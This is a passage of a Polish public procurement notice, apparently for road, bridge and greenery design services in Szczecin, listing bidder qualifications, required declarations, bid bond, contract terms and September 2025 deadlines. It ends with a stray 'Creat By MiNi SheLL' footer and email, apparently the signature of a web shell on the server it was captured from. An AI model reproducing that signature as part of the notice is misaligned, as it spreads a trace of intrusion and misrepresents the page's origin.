budowlanych oraz programu funkcjonalno-użytkowego dotyczący budowy lub przebudowy obiektu budowlanego<br/>posadowionego na fundamencie pośrednim. zakończonej wydaniem decyzji o pozwoleniu na budowę lub decyzją o<br/>Zezwoleniu na Realizacją Inwestycji Drogowej na stanowisku projektanta branży inżynieryjnej mostowej lub konstrukcyjnobudowlanej.<br/>2) Projektant branży inżynieryjnej drogowej posiadający:<br/>uprawnienia do projektowania w specjalności inżynieryjnej drogowej bez ograniczeń, zgodnie z przepisami ustawy z dnia 7<br/>lipca 1994 r. Prawo budowlane lub im odpowiadające, ważne uprawnienia budowlane, które zostały wydane na podstawie<br/>wcześniej obowiązujących przepisów lub odpowiadające im uprawnienia budowlane, które zostały wydane obywatelom<br/>państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych<br/>przepisów ustawy z dnia 7 lipca 1994 r. Prawo budowlane oraz ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania<br/>kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej oraz<br/>3) Projektant branży zieleni posiadający:<br/>Wykształcenie kierunkowe lub podobne np. ogrodnicze ze specjalnością dendrologii <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.<br/>Wykazu usług o których mowa w Rozdziale XV pkt. 3 SWZ, wykonanych nie wcześniej niż w okresie ostatnich 5 lat liczonych wstecz<br/>od dnia, w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z<br/>podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których usługi te zostały wykonane, oraz<br/>załączeniem dowodów określających czy te usługi budowlane zostały wykonane należycie.<br/>Dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały<br/>wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie<br/>dokumenty<br/>4) Wykazu osób, o których mowa w Rozdziale XV pkt. 4, skierowanych przez wykonawcę do realizacji zamówienia publicznego wraz<br/>z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania<br/>zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi<br/>osobami.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) Oświadczenia<br/>wykonawcy, w zakresie wynikającym z art. 108 ust. 1 pkt 5 Ustawy, o braku przynależności do tej samej grupy kapitałowej, w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 z późn. zm.), z innym<br/>wykonawcą, który złożył odrębną ofertę, ofertę częściową albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z<br/>dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej niezależnie od innego wykonawcy<br/>należącego do tej samej grupy kapitałowej;<br/>2) oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 Ustawy, w zakresie<br/>podstaw wykluczenia z postępowania określonych w:<br/>a) art. 108 ust. 1 pkt 3 Ustawy,<br/>b) art. 108 ust. 1 pkt 4 Ustawy, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego,<br/>c) art. 108 ust. 1 pkt 5 Ustawy dotyczących zawarcia z innymi Wykonawcami porozumienia mającego na celu zakłócenie<br/>konkurencji,<br/>d) art. 108 ust. 1 pkt 6 Ustawy,<br/>e) art. 7 ust. 1 pkt 1-3 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu<br/>agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. poz. 835)</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Ofertę oraz oświadczenie, o którym mowa w pkt 3 ppkt 1) należy złożyć pod rygorem nieważności w formie elektronicznej<br/>(tj. opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/>podpisem osobistym.<br/>2. Wykonawca zobowiązany jest złożyć ofertę zgodnie ze wzorem stanowiącym załącznik nr 1 do SWZ.<br/>3. Wraz z ofertą Wykonawca zobowiązany jest złożyć:<br/>1) Oświadczenie stanowiące dowód potwierdzający na dzień składania ofert brak podstaw wykluczenia oraz spełnianie<br/>warunków udziału w postępowaniu, zastępujące podmiotowe środki dowodowe – zgodnie z Załącznikiem nr 2 do SWZ<br/>W przypadku wspólnego ubiegania się o udzielenie zamówienia oświadczenie składa każdy<br/>z Wykonawców. W przypadku korzystania z zasobów innego podmiotu w celu wykazania spełniania warunku udziału w<br/>postępowaniu Wykonawca składa oświadczenie podmiotu udostępniającego zasoby (potwierdzające brak podstaw<br/>wykluczenia tego podmiotu oraz odpowiednio spełnienie warunków udziału w postępowaniu w zakresie, w jakim<br/>Wykonawca powołuje się na jego zasoby).<br/>2) Dokument, z którego wynika zakres umocowania do działania w imieniu Wykonawcy<br/>w postępowaniu o udzielenie zamówienia:<br/>a) Odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji<br/>o Działalności Gospodarczej lub innego właściwego rejestru.<br/>b) Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy, jeżeli w imieniu<br/>Wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z innych dokumentów, o których mowa w<br/>lit. a.<br/>Uwagi:<br/>1. Wykonawca nie jest zobowiązany do złożenia dokumentu, o którym mowa w lit a, jeżeli dokument Zamawiający może<br/>uzyskań za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do<br/>tych dokumentów.<br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego. Zasady określone w lit. b stosuje się odpowiednio do osoby działającej w imieniu Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia.<br/>3. W przypadku korzystania z zasobów innego podmiotu w celu wykazania spełnienia warunku udziału w postępowaniu<br/>zasady składania dokumentów potwierdzających umocowanie do reprezentowania, o których mowa w lit. a lub b oraz<br/>zasadę wyrażoną w uwadze 1 dotyczące podmiotu udostępniającego zasoby stosuje się odpowiednio.<br/>3) Zobowiązanie innego podmiotu, według załącznika nr 5, o którym mowa w Rozdziale XV pkt 19 ppkt 3) SWZ lub inny<br/>podmiotowy środek dowodowy (jeżeli dotyczy),<br/>4) Oświadczenie stanowiące dowód potwierdzający na dzień składania ofert brak podstaw wykluczenia na podstawie art. 7<br/>ust. 1 pkt 1-3 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu<br/>agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. poz. 835)– oświadczenie stanowi załącznik<br/>nr 3 do SWZ.<br/>5) Oryginał gwarancji lub poręczenia, jeśli wadium wnoszone jest w innej formie niż pieniądzu, z uwzględnieniem<br/>postanowień Rozdziału XXII.<br/>6) W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia - Oświadczenie konsorcjum/ spółki<br/>cywilnej z którego wynika, które roboty budowlane/usługi/dostawy wykonają poszczególni wykonawcy – oświadczenie<br/>składane na formularzu ofertowym zgodnie z postanowieniami Rozdziału XVIII pkt. 3. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 6.4.1) Informacje dotyczące wadium:<br/>1. Wykonawca przystępujący do postępowania o udzielenie zamówienia publicznego jest zobowiązany – przed upływem<br/>terminem składania ofert wnieść wadium w wysokości 2 000,00 zł (dwa tysiące złotych). <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Zamawiający zawiera umowę w sprawie zamówienia publicznego w terminie nie krótszym niż 5 dni od dnia przesłania<br/>zawiadomienia o wyborze najkorzystniejszej oferty.<br/>2. Zamawiający może zawrzeć umowę w sprawie zamówienia publicznego przed upływem terminu, o którym mowa w ust. 1,<br/>jeżeli w postępowaniu o udzielenie zamówienia prowadzonym w trybie podstawowym złożono tylko jedną ofertę.<br/>3. Jeżeli wykonawca, którego oferta została wybrana jako najkorzystniejsza, uchyla się od zawarcia umowy w sprawie<br/>zamówienia publicznego lub nie wnosi wymaganego zabezpieczenia należytego wykonania umowy, zamawiający może<br/>dokonać ponownego badania i oceny ofert spośród ofert pozostałych w postępowaniu wykonawców oraz wybrać<br/>najkorzystniejszą ofertę albo unieważnić postępowanie.<br/>4. Istotne postanowienia umowy, która zostanie zawarta z wykonawcą, którego oferta zostanie wybrana jako<br/>najkorzystniejsza zawiera załącznik nr 4 do SWZ. Zawarta umowa będzie jawna i będzie podlegała udostepnienia na<br/>zasadach określonych w przepisach o dostępie do informacji publicznej.<br/>5. Wykonawca najpóźniej przed podpisaniem umowy ma obowiązek przedłożyć Zamawiającemu dokumenty, o których<br/>mowa w SWZ, w szczególności:<br/>1) Polisy lub inne dokumenty potwierdzające zawarcie umowy ubezpieczenia, na zasadach określonych w § 13 wzoru<br/>umowy.<br/>2) umowę konsorcjum, o której mowa w rozdziale XVIII pkt 6 SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wszelkie zmiany treści niniejszej Umowy wymagają formy pisemnej pod rygorem nieważności.<br/>2. Zmiany zostaną wprowadzone aneksem do Umowy i będą skuteczne od daty zawarcia tego aneksu.<br/>Z uwagi na limit znaków szczegółowe informacje zawarte są w załączniku nr 4 do SWZ - we wzorze umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-09-15 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/sim.szczecin</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-09-15 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-10-14</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com